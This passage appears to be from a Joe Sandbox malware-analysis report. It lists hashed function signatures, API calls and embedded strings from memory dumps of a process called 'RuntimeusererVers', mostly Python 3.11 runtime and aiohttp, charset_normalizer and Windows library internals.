                                                                                                                                                                                                                                          • Opcode ID: d95f10c0e63c29ebf7223734b2b99d6cd48966227eee888d90296c3057f4ddec
                                                                                                                                                                                                                                          • Instruction ID: 050103054e66917a1ab84cec583c85d24063be7b263fa1d865110420c4af5d30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d95f10c0e63c29ebf7223734b2b99d6cd48966227eee888d90296c3057f4ddec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A621FA66B19F4AD1EB548F15EC9016927B1EFA8FE0F485232EA4F47368DE2CF4558700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_$Err_ExceptionFromModuleObjectSpecTypeType_With
                                                                                                                                                                                                                                          • String ID: Empty$Exception raised by Queue.get(block=0)/get_nowait().$_queue.Empty
                                                                                                                                                                                                                                          • API String ID: 1138974572-1946099957
                                                                                                                                                                                                                                          • Opcode ID: b734e69cca9964b11ba62dbc2179316181713867e2c5af3e713d8057d29c683d
                                                                                                                                                                                                                                          • Instruction ID: 6b483747ae5a2124386206ce49f4452e2a58c15f194cbe29b591aa727c268848
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b734e69cca9964b11ba62dbc2179316181713867e2c5af3e713d8057d29c683d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8019235B29F4B92EB058B39EC5457A23A0AF69BE4F445231D91F46758DE2CF054C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format
                                                                                                                                                                                                                                          • String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$__init__$aiohttp._http_parser.HttpRequestParser.__init__$at least$at most
                                                                                                                                                                                                                                          • API String ID: 376477240-514749419
                                                                                                                                                                                                                                          • Opcode ID: 8d8a400896e0d02cba68e875e0fc9c0864371ca79c7edb7425423cc71ca58b08
                                                                                                                                                                                                                                          • Instruction ID: 7aa0b5de795db6a017288c16b67f0e1d50955f735628c951adf386b5ff12d150
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d8a400896e0d02cba68e875e0fc9c0864371ca79c7edb7425423cc71ca58b08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B31E732A28F8185EB109B55FC402AA73A4FB887A8F544735EE9D53BA4DF7CE2558700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$ClearDeallocExceptionMatchesStringUnraisableWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 36411185-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_List_StringThread_allocate_lock
                                                                                                                                                                                                                                          • String ID: can't allocate lock
                                                                                                                                                                                                                                          • API String ID: 214698565-1504453919
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Dict_HashItem_Known
                                                                                                                                                                                                                                          • String ID: aiohttp._http_parser.parser_error_from_errno
                                                                                                                                                                                                                                          • API String ID: 680588069-345607510
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocErr_Format
                                                                                                                                                                                                                                          • String ID: Expected %.16s, got %.200s$aiohttp._http_parser.RawRequestMessage.__setstate_cython__$tuple
                                                                                                                                                                                                                                          • API String ID: 186121651-2336066056
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638693744.00007FF81EC61000.00000020.00000001.01000000.0000006F.sdmp, Offset: 00007FF81EC60000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec60000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Import$Capsule_DeallocImport_Module
                                                                                                                                                                                                                                          • String ID: charset_normalizer.md__mypyc$charset_normalizer.md__mypyc.init_charset_normalizer___md
                                                                                                                                                                                                                                          • API String ID: 1394619730-824592145
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638905947.00007FF81EC71000.00000020.00000001.01000000.0000006E.sdmp, Offset: 00007FF81EC70000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$BuildCreateErr_FromRestoreSaveSequentialSizeUuidValue_Windows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 170011378-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object_$ClearDeallocRefsThread_free_lockThread_release_lockTrackWeak
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 778659985-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON311 ref: 00007FF81ECADB8B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyThreadState_Get.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5B7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyErr_Fetch.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5E8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _PyObject_GetDictPtr.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF5F5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyObject_Not.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF6C2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyErr_Restore.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF702
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyFrame_New.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF95D
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: PyTraceBack_Here.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF972
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF986
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81ECAF590: _Py_Dealloc.PYTHON311(?,?,?,?,?,?,?,?,?,?,00000000,00007FF81EC96EE5), ref: 00007FF81ECAF99A
                                                                                                                                                                                                                                          • PyErr_Occurred.PYTHON311 ref: 00007FF81ECADB93
                                                                                                                                                                                                                                          • PyErr_SetString.PYTHON311 ref: 00007FF81ECADBAF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Dealloc$Object_$Back_DictFetchFrame_HereOccurredRestoreState_StringThreadTrace
                                                                                                                                                                                                                                          • String ID: init aiohttp._http_parser
                                                                                                                                                                                                                                          • API String ID: 3276581674-588849299
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format
                                                                                                                                                                                                                                          • String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$_websocket_mask_cython$exactly
                                                                                                                                                                                                                                          • API String ID: 376477240-2163499689
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Entermemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2581898777-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF81DF30D58), ref: 00007FF81DF2E731
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF81DF30D58), ref: 00007FF81DF2E793
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF81DF30D58), ref: 00007FF81DF2E7E0
                                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF81DF30D58), ref: 00007FF81DF2E809
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Entermalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3130977980-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Object_Track
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 887704541-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_Size
                                                                                                                                                                                                                                          • String ID: __init__$aiohttp._http_parser.RawRequestMessage.__init__
                                                                                                                                                                                                                                          • API String ID: 1288431816-4042305137
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: abort
                                                                                                                                                                                                                                          • String ID: Invalid method encountered$PTIONS
                                                                                                                                                                                                                                          • API String ID: 4206212132-3544517189
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF81DF3105A), ref: 00007FF81DF2E856
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF81DF3105A), ref: 00007FF81DF2E878
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF81DF3105A), ref: 00007FF81DF2E889
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2978645861-0